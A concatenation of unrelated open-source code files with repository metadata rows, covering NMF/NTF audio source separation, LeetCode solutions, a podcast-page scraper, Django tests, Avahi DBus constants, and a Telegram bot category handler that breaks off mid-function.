np.conj(np.transpose(self._A[:,:,f])))))
# correct till here
self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
WoH = np.zeros((self.F, self.T, self.K))
for k in range(self.K):
W_k = self._W[:,k].reshape(-1,1)
H_k = self._H[k,:].reshape(1,-1)
WoH[:,:,k] = np.matmul(W_k, H_k)
Q_num = np.matmul(VP_neg.reshape((self.J, self.F*self.T)), WoH.reshape((self.F*self.T, self.K)))
Q_den = np.matmul(V_pos.reshape((self.J, self.F*self.T)), WoH.reshape((self.F*self.T, self.K)))
self._Q = np.multiply(self._Q, np.divide(Q_num, Q_den))
QoH = self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
W_num = np.matmul(np.moveaxis(VP_neg, 1, 0).reshape((self.F, self.J*self.T)), QoH.reshape((self.J*self.T, self.K)))
W_den = np.matmul(np.moveaxis(V_pos, 1, 0).reshape((self.F, self.J*self.T)), QoH.reshape((self.J*self.T, self.K)))
self._W = np.multiply(self._W, np.divide(W_num, W_den))
QoW = np.zeros((self.J, self.F, self.K))
for k in range(self.K):
Q_k = self._Q[:,k].reshape((-1, 1))
W_k = self._W[:,k].reshape((1,-1))
QoW[:,:,k] = np.matmul(Q_k, W_k)
self.calculate_V()
VP_neg = np.multiply(np.power(self._V, -2), bar_P)
V_pos = np.power(self._V, -1)
H_num = np.matmul(VP_neg.reshape((self.J*self.F,self.T)).transpose(), QoW.reshape((self.J*self.F, self.K)))
H_den = np.matmul(V_pos.reshape((self.J*self.F,self.T)).transpose(), QoW.reshape((self.J*self.F, self.K)))
self._H = np.multiply(self._H, np.divide(H_num, H_den).transpose())
# small error in V and H
for j in range(self.J):
nonzero_f_ind = np.nonzero(self._A[0, j, :])
self._A[1, j, nonzero_f_ind] = np.divide(self._A[1, j, nonzero_f_ind], self.sign(self._A[0,j,nonzero_f_ind]))
self._A[0, j, nonzero_f_ind] = np.divide(self._A[0, j, nonzero_f_ind], self.sign(self._A[0,j,nonzero_f_ind]))
A_scale = np.power(np.abs(self._A[0,j,:]),2) + np.power(np.abs(self._A[1,j,:]),2)
self._A[:, j,:] = np.divide(self._A[:, j,:], np.tile(np.sqrt(A_scale).reshape(1,-1),(self.I,1)))
self._W[:,self.source_ind[j]] = np.multiply(self._W[:,self.source_ind[j]], np.matmul(A_scale.reshape(-1,1),np.ones((1,len(self.source_ind[j])))))
#
# print(self._A[0,0,0])
# print(self._A[0,1,1])
# print(self._A[1,0,0])
# print(self._A[1,1,1])
scale = np.sum(self._Q, axis=0)
self._Q = np.multiply(self._Q, np.tile(np.power(scale,-1),(self.J,1)))
self._W = np.multiply(self._W, np.tile(scale,(self.F,1)))
scale = np.sum(self._W, axis=0).reshape(1,-1)
self._W = np.multiply(self._W, np.tile(np.power(scale,-1),(self.F,1)))
self._H = np.multiply(self._H, np.tile(scale.transpose(),(1,self.T)))
#
self.calculate_V()
# print(self._V[0,0,0])
# print(self._V[0,1,1])
# print(self._V[1,0,0])
# print(self._V[1,1,1])
criterion = np.sum(np.divide(bar_P, self._V) - np.log(np.divide(bar_P, self._V))) - self.J*self.F*self.T
def sign(self, x):
return np.divide(x,np.abs(x))
def calculate_V(self):
QoH = np.zeros((self.J, self.T, self.K))
for k in range(self.K):
Q_k = self._Q[:,k].reshape((-1, 1))
H_k = self._H[k,:].reshape((1,-1))
QoH[:,:,k] = np.matmul(Q_k, H_k)
self._V = np.zeros((self.J, self.F, self.T))
for j in range(self.J):
self._V[j, :, :] = np.matmul(self._W, QoH[j,:,:].reshape((self.T, self.K)).transpose())
return QoH
def reconstruct(self):
Y = np.zeros((self.I,self.J,self.F,self.T), dtype=complex)
for t in range(self.T):
for f in range(self.F):
RV = np.zeros((self.I, self.I))
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
RV = RV + (np.matmul(self._A[:,start_index:end_index,f],np.conj(np.transpose(self._A[:,start_index:end_index,f]))) * self._V[j,f,t])
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
R = np.matmul(self._A[:,start_index:end_index,f],np.conj(np.transpose(self._A[:,start_index:end_index,f])))
Y[:,j,f,t] = np.matmul(np.matmul((R * self._V[j,f,t]), np.linalg.inv(RV)), self._Xb[:,f,t])
return Y
def getAV(self):
return self._A, self._V
if __name__ == '__main__':
# I = 2
# F = 50
# T = 200
# J = 2
# IJ = I * J
# K_partition = np.asarray([20,20])
# K = np.sum(K_partition)
# X = np.random.randn(I,F,T)
# V = np.random.rand(I,F,T)
# mix_psd = 0.5 * (np.mean(np.power(np.abs(X[0,:,:]),2) + np.power(np.abs(X[1,:,:]),2),axis=1))
# mix_psd = mix_psd.reshape((-1, 1))
# A = 0.5 * np.multiply(1.9 * np.abs(np.random.randn(I,IJ,F)) + 0.1 * np.ones((I,IJ,F)),np.sign(np.random.randn(I,IJ,F) + 1j *np.random.randn(I,IJ,F)))
# W = 0.5 * np.multiply(np.abs(np.random.randn(F,K)) + np.ones((F,K)), np.matmul(mix_psd, np.ones((1,K))))
# H = 0.5 * np.abs(np.random.randn(K,T)) + np.ones((K,T))
# Q = 0.5 * np.abs(np.random.randn(J,K)) + np.ones((J,K))
# sigma_b = mix_psd / 100
#
# QoH = np.zeros((J, T, K))
# for k in range(K):
# Q_k = Q[:,k].reshape((-1, 1))
# H_k = H[k,:].reshape((1,-1))
# QoH[:,:,k] = np.matmul(Q_k, H_k)
#
# V = np.zeros((J, F, T))
# for j in range(J):
# V[j, :, :] = np.matmul(W, QoH[j,:,:].reshape((K, T)))
K_partition = np.asarray([20,20,20])
A = loadmat('mat_files/saveA.mat')['A']
W = loadmat('mat_files/saveW.mat')['W']
H = loadmat('mat_files/saveH.mat')['H']
Q = loadmat('mat_files/saveQ.mat')['Q']
V = loadmat('mat_files/saveV.mat')['V']
X = loadmat('mat_files/saveX.mat')['x']
sigma_b = loadmat('mat_files/saveSig_b.mat')['sig_b']
bn = beta_NTF(W, H, X, A, sigma_b, Q, V, K_partition, epochs=22)
bn.train()
bn.reconstruct()
| TeunKrikke/SourceSeparationNMF | CovNTF/beta_ntf_np.py | beta_ntf_np.py | py | 13,598 | python | en | code | 1 | github-code | 36 |
37634012720 | # Given the edges of a directed graph where edges[i] = [ai, bi] indicates there is an edge between nodes ai and bi, and two nodes source and destination of this graph, determine whether or not all paths starting from source eventually, end at destination, that is:
# At least one path exists from the source node to the destination node
# If a path exists from the source node to a node with no outgoing edges, then that node is equal to destination.
# The number of possible paths from source to destination is a finite number.
# Return true if and only if all roads from source lead to destination.
# Example 1:
# Input: n = 3, edges = [[0,1],[0,2]], source = 0, destination = 2
# Output: false
# Explanation: It is possible to reach and get stuck on both node 1 and node 2.
# Example 2:
# Input: n = 4, edges = [[0,1],[0,3],[1,2],[2,1]], source = 0, destination = 3
# Output: false
# Explanation: We have two possibilities: to end at node 3, or to loop over node 1 and node 2 indefinitely.
# Example 3:
# Input: n = 4, edges = [[0,1],[0,2],[1,3],[2,3]], source = 0, destination = 3
# Output: true
# Example 4:
# Input: n = 3, edges = [[0,1],[1,1],[1,2]], source = 0, destination = 2
# Output: false
# Explanation: All paths from the source node end at the destination node, but there are an infinite number of paths, such as 0-1-2, 0-1-1-2, 0-1-1-1-2, 0-1-1-1-1-2, and so on.
# Example 5:
# Input: n = 2, edges = [[0,1],[1,1]], source = 0, destination = 1
# Output: false
# Explanation: There is infinite self-loop at destination node.
# Constraints:
# 1 <= n <= 104
# 0 <= edges.length <= 104
# edges.length == 2
# 0 <= ai, bi <= n - 1
# 0 <= source <= n - 1
# 0 <= destination <= n - 1
# The given graph may have self-loops and parallel edges.
class Solution:
def leadsToDestination(self, n: int, edges: List[List[int]], source: int, destination: int) -> bool:
graph = {}
for s, e in edges:
graph.setdefault(s, []).append(e)
non_destination = False
found_path = False
is_loop = False
seen = {source}
def bt(s):
nonlocal is_loop, non_destination, found_path
if is_loop or non_destination:
return
nexts = graph.get(s, [])
if not nexts:
if s != destination:
non_destination = True
else:
found_path = True
return
for n in nexts:
if n in seen:
is_loop = True
return
else:
seen.add(n)
bt(n)
seen.remove(n)
bt(source)
return found_path and not is_loop and not non_destination
| sunnyyeti/Leetcode-solutions | 1059 All Paths from Souce Lead to Destination.py | 1059 All Paths from Souce Lead to Destination.py | py | 2,779 | python | en | code | 0 | github-code | 36 |
7662718828 | import sqlite3
import urllib
from bs4 import BeautifulSoup
from datetime import datetime
conn = sqlite3.connect('pftcrawlerdb.sqlite')
cur = conn.cursor()
# Setup database
cur.executescript('''
DROP TABLE IF EXISTS Podcasts;
DROP TABLE IF EXISTS Appearances;
CREATE TABLE Podcasts (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Appearances (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
podcast_id INTEGER,
episode INTEGER,
title STRING,
date DATETIME,
link TEXT UNIQUE)
''')
url = raw_input('Enter - ')
if len(url) == 0 : url = 'http://www.earwolf.com/person/paul-f-tompkins/'
html = urllib.urlopen(url).read()
soup = BeautifulSoup(html, 'lxml')
divTags = soup("div", {"class":"ep-description"})
# comment out when not debugging
# i = int(raw_input('Enter iterations to run: '))
for dtag in divTags:
# comment out when not debugging
# if i == 0: break
# i -= 1
# clear title and link list vars
eptitle = ''
eplink = ''
podcast = ''
epnum = ''
epdatestr = ''
epdate = datetime
# get ep title
eptitle = (dtag.parent.h1.text).replace(':', ' - ')
# get ep link
eplink = dtag.a.get('href', None)
# parse text in span texts to a list & convert to ascii
spanTags = dtag.find_all('span')
tagTexts = []
for tag in spanTags : tagTexts.append((tag.text).encode('ascii', 'ignore'))
# get podcast name
podcast = tagTexts[0].split('#')[0].strip()
# get episode number
epnum = tagTexts[0].split('#')[1].strip()
# get episode date or assign earliest date if date string not parsable
epdatestr = tagTexts[1].strip()
try:
epdate = datetime.strptime(epdatestr, '%B %d, %Y')
except:
epdate = datetime.min
# write values to database
cur.execute('''INSERT OR IGNORE INTO Podcasts (name)
VALUES ( ? )''', ( podcast, ) )
cur.execute('SELECT id FROM Podcasts WHERE name = ? ', (podcast, ))
pod_id = cur.fetchone()[0]
cur.execute('''INSERT OR REPLACE INTO Appearances
(podcast_id, episode, title, date, link) VALUES ( ?, ?, ?, ?, ? )''',
( pod_id, epnum, eptitle, epdate, eplink ) )
conn.commit()
# print alleps
#
#
# if len(titleerror) != 0: print 'There were title errors: ', titleerror
#
# if len(linkerror) != 0: print 'There were link errors: ', linkerror
#
#
# for key, value in alleps.items(): print value[0]
| astewa13/PFTCrawler | ScrapeEarwolf.py | ScrapeEarwolf.py | py | 2,589 | python | en | code | 0 | github-code | 36 |
23111168251 | from mixer.auto import mixer
from rest_framework.test import APITestCase, APIClient
from stock_setup_info.factory import IndustryFactory
from stock_setup_info.models import Industry
# Create your tests here.
class BaseViewTest(APITestCase):
client = APIClient()
@staticmethod
def create_industry(name="", exchange_code="", sync_flag="", logo=""):
if name != "" and exchange_code != "":
Industry.objects.create(
name=name, exchange_code=exchange_code, sync_flag=sync_flag, logo=logo
)
def setUp(self):
self.create_industry("Agriculture", "AG", "0", "0")
self.create_industry("Finance", "AG", "0", "0")
self.industry = IndustryFactory()
class AllModelCreatedTest(BaseViewTest):
def test_model_can_create_list_of_industry(self):
"""
This test ensures that all the industries added in the setup method exists
"""
new_count = Industry.objects.count()
self.assertNotEqual(0, new_count)
def test_model_via_mixer(self):
obj = mixer.blend("stock_setup_info.models.Industry")
assert obj.pk > 1, "Should create an Industry Instance"
| Maxcutex/stockman_project | stock_setup_info/tests/test_models/test_industry_model.py | test_industry_model.py | py | 1,184 | python | en | code | 2 | github-code | 36 |
38437381382 | def dimensoes(matriz: list) -> str:
return f"{len(matriz)}X{len(matriz[0])}"
def soma_matrizes(m1: list, m2: list) -> list:
if dimensoes(m1) != dimensoes(m2):
return False
result = []
for x in range(len(m1)):
l = []
for i_k, i_v in enumerate(m1[x]):
for j_k, j_v in enumerate(m2[x]):
if i_k == j_k:
l.append(i_v + j_v)
result.append(l)
return result
| carlos-moreno/algorithms | soma_matrizes.py | soma_matrizes.py | py | 452 | python | en | code | 0 | github-code | 36 |
34366380953 | from scripts.hackerrank.isLeapYear import is_leap, is_leap2, is_leap3, is_leap4
class Test:
test_cases = [
[2004, True],
[2008, True],
[2012, True],
[2016, True],
[2005, False],
[2009, False],
[2013, False],
[2017, False],
]
testable_functions = [
is_leap, is_leap2, is_leap3, is_leap4
]
def test_is_leap(self):
for f in self.testable_functions:
for case, expected in self.test_cases:
assert expected == f(case)
| TrellixVulnTeam/learning_to_test_code_BL81 | tests/hackerrank/test_isLeapYear.py | test_isLeapYear.py | py | 560 | python | en | code | 0 | github-code | 36 |
36911764017 | import emp,pickle
f=open("emp.dat","wb")
n=int(input("enter the number"))
for i in range(n):
eid=int(input("enter"))
name=input("enter teh name")
sal=float(input("enter the sal"))
e=emp.Emp_class(eid,name,sal)
pickle.dump(e,f)#this will enter the data in emp.dat
# print(type(e))
f.close() | Sahil123git/Python | Pickling/picklse.py | picklse.py | py | 323 | python | en | code | 0 | github-code | 36 |
18036889347 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:
self.result = 0
oldPaths = defaultdict(int)
oldPaths[0] = 1
self.dfs(root, targetSum, 0, oldPaths)
return self.result
def dfs(self, root, targetSum, currPathSum, oldPaths):
# exit condition
if root == None:
return
currPathSum += root.val
oldPathWanted = currPathSum - targetSum
self.result += oldPaths[oldPathWanted]
oldPaths[currPathSum] = oldPaths[currPathSum] + 1
# dfs children
self.dfs(root.left, targetSum, currPathSum, oldPaths)
self.dfs(root.right, targetSum, currPathSum, oldPaths)
oldPaths[currPathSum] -= 1 | LittleCrazyDog/LeetCode | 437-path-sum-iii/437-path-sum-iii.py | 437-path-sum-iii.py | py | 974 | python | en | code | 2 | github-code | 36 |
37351904509 | # This file is part of avahi.
#
# avahi is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# avahi is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with avahi; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA.
# Some definitions matching those in avahi-common/defs.h
import dbus
SERVER_INVALID, SERVER_REGISTERING, SERVER_RUNNING, SERVER_COLLISION, SERVER_FAILURE = range(0, 5)
ENTRY_GROUP_UNCOMMITED, ENTRY_GROUP_REGISTERING, ENTRY_GROUP_ESTABLISHED, ENTRY_GROUP_COLLISION, ENTRY_GROUP_FAILURE = range(0, 5)
DOMAIN_BROWSER_BROWSE, DOMAIN_BROWSER_BROWSE_DEFAULT, DOMAIN_BROWSER_REGISTER, DOMAIN_BROWSER_REGISTER_DEFAULT, DOMAIN_BROWSER_BROWSE_LEGACY = range(0, 5)
PROTO_UNSPEC, PROTO_INET, PROTO_INET6 = -1, 0, 1
IF_UNSPEC = -1
PUBLISH_UNIQUE = 1
PUBLISH_NO_PROBE = 2
PUBLISH_NO_ANNOUNCE = 4
PUBLISH_ALLOW_MULTIPLE = 8
PUBLISH_NO_REVERSE = 16
PUBLISH_NO_COOKIE = 32
PUBLISH_UPDATE = 64
PUBLISH_USE_WIDE_AREA = 128
PUBLISH_USE_MULTICAST = 256
LOOKUP_USE_WIDE_AREA = 1
LOOKUP_USE_MULTICAST = 2
LOOKUP_NO_TXT = 4
LOOKUP_NO_ADDRESS = 8
LOOKUP_RESULT_CACHED = 1
LOOKUP_RESULT_WIDE_AREA = 2
LOOKUP_RESULT_MULTICAST = 4
LOOKUP_RESULT_LOCAL = 8
LOOKUP_RESULT_OUR_OWN = 16
LOOKUP_RESULT_STATIC = 32
SERVICE_COOKIE = "org.freedesktop.Avahi.cookie"
SERVICE_COOKIE_INVALID = 0
DBUS_NAME = "org.freedesktop.Avahi"
DBUS_INTERFACE_SERVER = DBUS_NAME + ".Server"
DBUS_PATH_SERVER = "/"
DBUS_INTERFACE_ENTRY_GROUP = DBUS_NAME + ".EntryGroup"
DBUS_INTERFACE_DOMAIN_BROWSER = DBUS_NAME + ".DomainBrowser"
DBUS_INTERFACE_SERVICE_TYPE_BROWSER = DBUS_NAME + ".ServiceTypeBrowser"
DBUS_INTERFACE_SERVICE_BROWSER = DBUS_NAME + ".ServiceBrowser"
DBUS_INTERFACE_ADDRESS_RESOLVER = DBUS_NAME + ".AddressResolver"
DBUS_INTERFACE_HOST_NAME_RESOLVER = DBUS_NAME + ".HostNameResolver"
DBUS_INTERFACE_SERVICE_RESOLVER = DBUS_NAME + ".ServiceResolver"
DBUS_INTERFACE_RECORD_BROWSER = DBUS_NAME + ".RecordBrowser"
def byte_array_to_string(s):
r = ""
for c in s:
if c >= 32 and c < 127:
r += "%c" % c
else:
r += "."
return r
def txt_array_to_string_array(t):
l = []
for s in t:
l.append(byte_array_to_string(s))
return l
def string_to_byte_array(s):
r = []
for c in s:
r.append(dbus.Byte(ord(c)))
return r
def string_array_to_txt_array(t):
l = []
for s in t:
l.append(string_to_byte_array(s))
return l
def dict_to_txt_array(txt_dict):
l = []
for k,v in txt_dict.items():
l.append(string_to_byte_array("%s=%s" % (k,v)))
return l
| RMerl/asuswrt-merlin | release/src/router/avahi-0.6.31/avahi-python/avahi/__init__.py | __init__.py | py | 3,082 | python | en | code | 6,715 | github-code | 36 |
28888308996 | '''
https://www.codewars.com/kata/52efefcbcdf57161d4000091/
The main idea is to count all the occurring characters in a string. If you have a string like aba, then the result should be {'a': 2, 'b': 1}.
What if the string is empty? Then the result should be empty object literal, {}.
'''
# my solution
def count(str):
dict = {}
for i in str:
if i in dict:
dict[i] += 1
else:
dict[i] = 1
return dict
#! alternative-solution
from collections import Counter
def count(string):
return Counter(string)
# been seeing is Counter() all around lately. And I have the feeling this
# is more pythonic way to count a key-value | MSKose/Codewars | 6 kyu/Count characters in your string.py | Count characters in your string.py | py | 694 | python | en | code | 1 | github-code | 36 |
41068976001 | from matplotlib import pyplot as plt
from matplotlib import font_manager
# 设置中文
# !本字体路径为本机一款字体路径,运行时可任意替换为系统中的一款中文字体路径,必须为中文字体,系统不限:Windows/macOS/Linux
my_font = font_manager.FontProperties(
fname='C:\Windows\Fonts\STFANGSO.TTF')
# 设置图片大小
plt.figure(figsize=(20, 8), dpi=80)
# 数据
x_3 = range(1, 32)
x_10 = range(51, 82)
y_1 = [11, 17, 16, 11, 12, 11, 12, 6, 6, 7, 8, 9, 12, 15, 14, 17, 18,
21, 16, 17, 20, 14, 15, 15, 15, 19, 21, 22, 22, 22, 23] # 3月份
y_2 = [26, 26, 28, 19, 21, 17, 16, 19, 18, 20, 20, 19, 22, 23, 17, 20,
21, 20, 22, 15, 11, 15, 5, 13, 17, 10, 11, 13, 12, 13, 6] # 10月份
# 设置坐标刻度
_x = list(x_3)+list(x_10) # 将两个横坐标转化为列表相加,列表的值刚好中间缺少值,形成和坐标点的对应
_xticks_ = ['3月{}日'.format(i) for i in range(1, 32)]
_xticks_ += ['10月{}日'.format(i) for i in range(1, 32)]
plt.xticks(_x[::3], _xticks_[::3], fontproperties=my_font,
rotation=45) # _xticks_和_x一一对应 坐标刻度太密集可以将列表取步长
# 设置坐标轴描述
plt.xlabel("时间", fontproperties=my_font)
plt.ylabel("温度(℃)", fontproperties=my_font)
plt.title("3月和10月温度比较图", fontproperties=my_font)
# 绘图
plt.scatter(x_3, y_1, label="3月", color='r')
plt.scatter(x_10, y_2, label="10月")
# ?添加图例 添加图例必须在画图之后!!!!!!
plt.legend(prop=my_font, loc='upper left')
# 展示
plt.show() | XiongZhouR/python-of-learning | matplotlib/scatter.py | scatter.py | py | 1,563 | python | zh | code | 1 | github-code | 36 |
35862373343 | import logging
import time
from aiogram import F, Router
from aiogram.fsm.context import FSMContext
from aiogram.types import CallbackQuery, InlineKeyboardMarkup, Message
from sqlalchemy.orm import Session
from keyboards.keyboards import (
back_keyboard,
pagination_keyboard,
yes_no_keyboard,
)
from keyboards.methodist_keyboards import (
add_category_keyboard,
category_keyboard_methodist,
confirm_category_keyboard,
edit_category_keyboard,
methodist_profile_keyboard,
)
from lexicon.lexicon import BUTTONS, LEXICON
from utils.db_commands import (
category_deleting,
create_category,
get_all_categories,
select_user,
set_category_param,
)
from utils.pagination import PAGE_SIZE
from utils.states_form import AddCategory, CategoryList, EditCategory
from utils.utils import generate_categories_list, get_category_info
logger = logging.getLogger(__name__)
methodist_category_router = Router()
# Обработчики добавления категории
@methodist_category_router.message(
F.text.in_(
[
BUTTONS["RU"]["add_category"],
BUTTONS["TT"]["add_category"],
BUTTONS["EN"]["add_category"],
]
)
)
async def add_category(message: Message, session: Session):
"""Обработчик кнопки Добавить категорию."""
try:
user = select_user(session, message.from_user.id)
language = user.language
lexicon = LEXICON[language]
await message.answer(
lexicon["add_category"],
reply_markup=add_category_keyboard(language),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при добавлении категории в базу: {err}")
except Exception as err:
logger.error(f"Ошибка при добавлении категории в базу: {err}")
@methodist_category_router.callback_query(F.data == "ready_category")
async def start_add_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Начинает сценарий добавления категории в базу."""
try:
await query.answer()
await state.clear()
user = select_user(session, query.from_user.id)
language = user.language
lexicon = LEXICON[language]
await state.update_data(language=language)
await state.set_state(AddCategory.name)
await query.message.answer(lexicon["send_category_name"])
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключе при запросе названия категории: {err}")
except Exception as err:
logger.error(f"Ошибка при запросе названия категории: {err}")
@methodist_category_router.message(AddCategory.name)
async def process_add_category_name(
message: Message, state: FSMContext, session: Session
):
"""Обработчик принимает имя категории, сохраняет категорию в БД.
Просит прислать сообщение.
Отправляет собранные данные для подтверждения корректности
или для перехода к редактированию.
"""
try:
data = await state.get_data()
await state.clear()
language = data["language"]
lexicon = LEXICON[language]
data["name"] = message.text
category_created = create_category(session, data)
if not category_created:
await message.answer(
lexicon["error_adding_category"],
reply_markup=methodist_profile_keyboard(language),
)
return
category_info = get_category_info(data["name"], lexicon, session)
info = category_info["info"]
category_id = category_info["id"]
# Собираем пагинацию для списка категорий, если пользователь
# перейдет к редактированию созданной категории
categories = get_all_categories(session)
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=0,
page_size=PAGE_SIZE,
)
categories_ids = page_info["categories_ids"]
new_current_page = page_info["current_page"]
query_id = None
for key in categories_ids.keys():
if categories_ids[key] == categories_ids:
query_id = key
await state.set_state(EditCategory.confirm_task)
await state.update_data(
category_id=category_id,
query_id=query_id,
current_page=new_current_page,
task_info=page_info,
language=language,
)
# Сообщаем пользователю, что сейчас покажем, что получилось
await message.answer(lexicon["confirm_adding_category"])
time.sleep(2)
# Показываем, что получилось
await message.answer(
info, reply_markup=confirm_category_keyboard(language)
)
except KeyError as err:
logger.error(
f"Ошибка в ключе при запросе подтверждения категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при запросе подтверждения категории: {err}")
@methodist_category_router.callback_query(F.data == "edit_category")
async def process_edit_category(query: CallbackQuery, state: FSMContext):
"""Обарботчик инлайн кнопки Редактировать категорию.
Начинает сценарий внесения изменений в базу.
"""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
query_id = data["query_id"]
lexicon = LEXICON[language]
await query.message.answer(
lexicon["start_edit_category"],
reply_markup=edit_category_keyboard(language, cd=query_id),
)
await query.message.delete()
except KeyError as err:
logger.error(
f"Ошибка в ключе при начале редактирования категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при начале редактирования категории: {err}")
@methodist_category_router.callback_query(F.data == "edit_category_name")
async def edit_category_name(query: CallbackQuery, state: FSMContext):
"""Обработчик создает состояние для смены названия категории.
Просит прислать сообщение.
"""
try:
await query.answer()
data = await state.get_data()
await state.set_state(EditCategory.name)
language = data["language"]
lexicon = LEXICON[language]
await query.message.answer(lexicon["edit_category_name"])
await query.message.delete()
except KeyError as err:
logger.error(
"Ошибка в ключевом слове при запросе нового "
f"названия категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при запросе нового названия категории: {err}")
@methodist_category_router.message(EditCategory.name)
async def process_edit_name(
message: Message, state: FSMContext, session: Session
):
"""Обрабатывает сообщение для изменения названия категории."""
try:
data = await state.get_data()
language = data["language"]
query_id = data["query_id"]
lexicon = LEXICON[language]
category_saved = set_category_param(
session, category_id=data["category_id"], name=message.text
)
if not category_saved:
await message.answer(
lexicon["error_adding_category"],
reply_markup=methodist_profile_keyboard(language),
)
return
await message.answer(
lexicon["category_edited"],
reply_markup=edit_category_keyboard(language, cd=query_id),
)
except KeyError as err:
logger.error(
f"Ошибка в ключевом слове при изменении названия категории: {err}"
)
except Exception as err:
logger.error(f"Ошибка при изменении названия категории: {err}")
@methodist_category_router.callback_query(
F.data.in_({"back_to_category_list", "category:next", "category:previous"})
)
async def show_category_list_callback(query: CallbackQuery, state: FSMContext):
"""Обарботчик кнопки Посмотреть/редактировать категории.
Показывает все созданные категории с пагинацией.
"""
try:
await query.answer()
data = await state.get_data()
categories = data["task_info"]["categories"]
current_page = data["current_page"]
language = data["language"]
lexicon = LEXICON[language]
if query.data == "category:next":
current_page += 1
elif query.data == "category:previous":
current_page -= 1
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=current_page,
page_size=PAGE_SIZE,
methodist=True,
)
msg = page_info["msg"]
first_item = page_info["first_item"]
final_item = page_info["final_item"]
new_current_page = page_info["current_page"]
lk_button = {
"text": BUTTONS[language]["lk"],
"callback_data": "profile",
}
await state.set_state(CategoryList.categories)
await state.update_data(
categories=categories,
current_page=new_current_page,
task_info=page_info,
)
if query.data == "back_to_category_list":
# Возвращаемся со страницы категории,
# текст нельзя редактировать
await query.message.answer(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
await query.message.delete()
return
await query.message.edit_text(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при просмотре списка категорий: {err}")
except Exception as err:
logger.error(f"Ошибка при просмотре списка категорий: {err}")
@methodist_category_router.callback_query(
F.data.startswith("back_to_category:") | F.data.startswith("category:")
)
@methodist_category_router.callback_query(F.data == "no:delete_category")
async def show_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Обработчик кнопок выбора отдельной категории.
Получаем условный id категории из callback_data, достаем реальный id из
состояние Data и получаем полную инфу о категории из базы данных.
"""
try:
await query.answer()
data = await state.get_data()
if not data:
user = select_user(session, query.from_user.id)
await query.message.answer(
LEXICON[user.language]["error_getting_category"],
reply_markup=InlineKeyboardMarkup(
inline_keyboard=category_keyboard_methodist(user.language)
),
)
return
language = data["language"]
lexicon = LEXICON[language]
# Достаем id категории из состояния и делаем запрос к базе
if "category_id" in data:
category_id = data["category_id"]
elif ("category_ids" in data) and query.data.startswith("category:"):
category_ids = int(query.data.split(":")[-1])
category_id = data["category_ids"][category_ids]
elif ("categories_ids" in data) and query.data.startswith("category:"):
category_ids = int(query.data.split(":")[-1])
category_id = data["categories_ids"][category_ids]
category_info = get_category_info(category_id, lexicon, session)
info = category_info["info"]
msg = f"{lexicon['category_chosen']}\n\n" f"{info}\n\n"
await state.set_state(EditCategory.category_id)
await state.update_data(category_id=category_id, query_id=category_id)
await query.message.answer(
msg, reply_markup=category_keyboard_methodist(language)
)
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключевом слове при получении категории: {err}")
except Exception as err:
logger.error(f"Ошибка при получении категории: {err}")
@methodist_category_router.callback_query(
EditCategory.confirm_task, F.data == "confirm"
)
async def process_saving_category_to_db(
query: CallbackQuery, state: FSMContext
):
"""Обработчик кнопки Подтверждаю."""
try:
await query.answer()
data = await state.get_data()
await state.clear()
language = data["language"]
lexicon = LEXICON[language]
await query.message.answer(
lexicon["category_added"],
reply_markup=methodist_profile_keyboard(language),
)
await query.message.delete()
except KeyError as err:
logger.error(f"Ошибка в ключе при добавлении категории: {err}")
except Exception as err:
logger.error(f"Ошибка при добавлении категории: {err}")
@methodist_category_router.message(
F.text.in_(
[
BUTTONS["RU"]["category_list"],
BUTTONS["TT"]["category_list"],
BUTTONS["EN"]["category_list"],
]
)
)
async def show_category_list(
message: Message, state: FSMContext, session: Session
):
"""Обарботчик кнопки Посмотреть/редактировать категории.
Показывает все созданные категории с пагинацией.
"""
try:
await state.clear()
user = select_user(session, message.from_user.id)
language = user.language
lexicon = LEXICON[language]
categories = get_all_categories(session)
if not categories:
await message.answer(
lexicon["no_categories_yet"],
reply_markup=add_category_keyboard(language),
)
return
current_page = 1
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
current_page=current_page,
page_size=PAGE_SIZE,
methodist=True,
)
msg = page_info["msg"]
category_ids = page_info["categories_ids"]
first_item = page_info["first_item"]
final_item = page_info["final_item"]
lk_button = {
"text": BUTTONS[language]["lk"],
"callback_data": "profile",
}
await state.set_state(CategoryList.categories)
await state.update_data(
categories=categories,
category_ids=category_ids,
current_page=current_page,
task_info=page_info,
language=language,
)
await message.answer(
msg,
reply_markup=pagination_keyboard(
buttons_count=len(categories),
start=first_item,
end=final_item,
cd="category",
